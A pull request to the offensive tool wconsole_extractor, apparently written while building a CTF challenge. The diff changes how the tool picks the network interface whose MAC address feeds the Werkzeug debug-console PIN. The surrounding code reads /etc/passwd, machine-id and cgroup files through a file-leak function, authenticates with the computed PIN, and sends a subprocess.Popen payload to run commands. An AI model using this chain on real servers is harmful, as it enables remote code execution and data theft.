### PR TITLE
fix get_uuid_node function - follow flask's order of interfaces

### DIFF
--- a/wconsole_extractor/main.py
+++ b/wconsole_extractor/main.py
@@ -308,8 +308,8 @@ class WConsoleExtractor:
 
             if len(matched) > 0:
                 uuid_node = str(int(matched[0].replace(":", ""), base=16))
-
-            return uuid_node
+                return uuid_node
+        
         error(f"Unable to find uuid node, no valid mac address found in {device_ids}")
 
     def compute_pin(self):

--- a/wconsole_extractor/main.py
+++ b/wconsole_extractor/main.py
@@ -49,7 +49,7 @@ class WConsoleExtractor:
         debug_mode, content = self.check_debug_mode()
         if not debug_mode:
             error(f"{self.base_url} does not seem to be in debug mode, interrupting...")
-        
+
         # Check leak file function
         etc_passwd = self.leak_function("/etc/passwd")
         if not etc_passwd or not self.etc_passwd_regex.match(etc_passwd):
@@ -70,14 +70,14 @@ class WConsoleExtractor:
 
         if not self.flask_path:
             error("Unable to find flask package name, please report it (https://github.com/Ruulian/wconsole_extractor/issues)")
-        
+
         self.probably_public_bits = [
-            self.username, 
+            self.username,
             self.modname,
             self.class_name,
             self.flask_path
         ]
-        
+
         # Private bits
         self.machine_id = self.get_machine_id()
         self.uuidnode = self.get_uuid_node()
@@ -117,14 +117,14 @@ class WConsoleExtractor:
     @staticmethod
     def get_venv(environ:dict) -> bool:
         return environ.get("VIRTUAL_ENV")
-    
+
     @staticmethod
     def get_version(soft, server):
         version = re.findall(soft + r"\/(\d\.\d+)\..*", server)
         if len(version) == 0:
             error(f"{soft} version not found")
         return version[0].strip()
-    
+
     @staticmethod
     def compare_versions(v1:str, v2:str):
         v1_split = v1.split(".")
@@ -132,7 +132,7 @@ class WConsoleExtractor:
 
         for i in range(3 - len(v1_split)):
             v1_split.append("0")
-        
+
         for i in range(3 - len(v2_split)):
             v2_split.append("0")
 
@@ -143,38 +143,38 @@ class WConsoleExtractor:
                 return 1
             if diff < 0:
                 return -1
-        
+
         return 0
 
     @staticmethod
     def sanitize_output(output:str):
         return output.replace("\\n", "\n")[2:-1]
-            
+
 
     def get(self, path:str):
         return self.sess.get(f"{self.base_url}{path}")
-    
+
     def get_headers(self):
         return self.get("/").headers
-    
+
     def ping(self):
         try:
             r = self.get("/")
             return r.status_code
         except:
             return 0
-        
+
     def check_debug_mode(self):
         r = self.get("/console")
         return r.status_code == 200, r.text
-    
+
     def check_werkzeug(self):
         headers = self.get_headers()
         return headers.get("Server")
-    
+
     def print(self, message=""):
         print(message, end="")
-    
+
     # Leaks
     def choose_username(self, etc_passwd:str):
         usernames = []
@@ -196,14 +196,14 @@ class WConsoleExtractor:
         for k, v in environ.items():
             if k == "USERNAME" or k == "USER" or k == "LOGNAME":
                 return v
-            
+
             # HOME variable -> parse home dirname
             if k == "HOME":
                 if v.startswith("/home/"):
                     return v[6:]
                 else:
                     return v[1:]
-        
+
         return ""
 
     def get_flask_path(self, venv:str) -> str:
@@ -261,21 +261,21 @@ class WConsoleExtractor:
             r = self.leak_function(path)
             if r != "":
                 return path
-            
+
         return ""
-    
+
     def get_machine_id(self):
         value = ""
-        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": 
+        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
             content = self.leak_function(filename)
             if content == "": continue
 
             v = content.splitlines()[0].strip()
-            
+
             if v:
                 value += v
                 break
-            
+
         try:
             content2 = self.leak_function("/proc/self/cgroup")
             value += content2.splitlines()[0].strip().rpartition("/")[2]
@@ -283,29 +283,43 @@ class WConsoleExtractor:
             pass
 
         return value
-    
+
     def get_uuid_node(self):
-        net_arp = self.leak_function("/proc/net/arp")
-        device_line = net_arp.splitlines()[1]
-        device_id = device_line.split(" ")[-1]
+        net_dev = self.leak_function("/proc/net/dev")
 
-        mac = self.leak_function(f"/sys/class/net/{device_id}/address")
+        device_ids = re.findall(r"(\w+):", net_dev)
+        # remove the loopback device
+        if "lo" in device_ids:
+            device_ids.remove("lo")
 
-        matched = re.findall(r"[0-9a-f:]+", mac)
+        if len(device_ids) == 0:
+            error("Unable to find device id, no interfaces found")
 
-        if len(matched) > 0:
-            uuid_node = str(int(matched[0].replace(":", ""), base=16))
+        # https://github.com/python/cpython/blob/1b0e63c81b54a937b089fe335761cba4a96c8cdf/Lib/uuid.py#L642
+        # Thus we first try to get the mac address of the first device alphabetically and then use the order of /proc/net/dev (which is the same as the order of ip link of _ip_getnode)
+        first_device = sorted(device_ids)[0]
+        device_ids.remove(first_device)
+        device_ids.insert(0, first_device)
 
-        return uuid_node
-    
+        for device_id in device_ids:
+            mac = self.leak_function(f"/sys/class/net/{device_id}/address")
+
+            matched = re.findall(r"[0-9a-f:]+", mac)
+
+            if len(matched) > 0:
+                uuid_node = str(int(matched[0].replace(":", ""), base=16))
+
+            return uuid_node
+        error(f"Unable to find uuid node, no valid mac address found in {device_ids}")
+
     def compute_pin(self):
         is_v2 = WConsoleExtractor.compare_versions(self.werkzeug_version, "2.0.0") >= 0
-        
+
         if is_v2:
             h = hashlib.sha1()
         else:
             h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
-        
+
         for bit in chain(self.probably_public_bits, self.private_bits):
             if not bit:
                 continue
@@ -333,7 +347,7 @@ class WConsoleExtractor:
                 rv = num
 
         return rv
-    
+
     def get_token(self, token_request_content):
         token = re.findall(r'SECRET = "(.+)";', token_request_content)
 
@@ -341,7 +355,7 @@ class WConsoleExtractor:
             error("Error while finding token")
 
         return token[0]
-    
+
     def authent(self):
         authent_path = f"/console?__debugger__=yes&cmd=pinauth&pin={self.pin_code}&s={self.token}"
         r = self.get(authent_path)
@@ -356,7 +370,7 @@ class WConsoleExtractor:
         argv = cmd.split(' ')
 
         self.authent()
-        
+
         payload = f"import subprocess; subprocess.Popen({argv},stdout=subprocess.PIPE,stderr=subprocess.STDOUT).communicate()"
         url = f"/console?__debugger__=yes&cmd={payload}&frm=0&s={self.token}"
         res = self.get(url)
@@ -364,7 +378,7 @@ class WConsoleExtractor:
         if res.status_code == 404:
             error("Error while sending command, please report the issue on tool's repository")
             return
-        
+
         soup = bs(res.text, 'html.parser')
         span = soup.find("span", attrs={"class":"string"})
         traceback = soup.find("div", attrs={"class":"traceback"})


### PR DESCRIPTION
Hi Ruulian, thanks for your work on wconsole_extractor. I was recently trying to create a CTF challenge with wconsole_extractors' procedure of recovering the flask pin in mind. Everything was working perfectly in development and local testing. But when pushed on the remote docker runners (that contain multiple network interfaces), the generated pin was wrong. After further investigation with the help of @apogiatzis, we went down the rabbit hole of finding out that flask had instead used a different interface than what is in /proc/net/arp.

Thus we propose the below, in order to follow flask's order of interfaces:

As flask uses uuid.getnode() which can be found [here](https://github.com/python/cpython/blob/1b0e63c81b54a937b089fe335761cba4a96c8cdf/Lib/uuid.py#L650)
The possible ways to generate a uuid are [_unix_getnode, _ip_getnode, _ifconfig_getnode, _random_getnode] in this exact order of precedence.
1) _unix_getnode - https://github.com/python/cpython/blob/main/Modules/_uuidmodule.c - uses SIOCGIFCONF -> returns the mac adress which is first alphabetically
2)  _ip_getnode - Uses the output of the `ip link` command, whereof the order is based on /proc/net/dev according to this [post](https://askubuntu.com/questions/1459246/how-to-reorder-output-of-ip-address)
3) _ifconfig_getnode - Uses the output of the `ifconfig` command, but since we are not using the commands directly the code below checks all the interfaces anyways as they will be listed in /proc/net/dev so nothing needs to be done for this method as all of its output is already checked
4) _random_getnode - If we have reached this point of code then that is really bad news, no interfaces had valid mac addresses and a random one was chosen, which we don't have a way of recovering. Fortunately we should never reach this point in the code as the `ip` or `ifconfig` command should be preinstalled in most Linux distributions

In order to adress the above the code below checks for the first interface alphabetically and then uses the order of /proc/net/dev until a valid mac address is found and then procceeds with the rest of the pin generation as usual!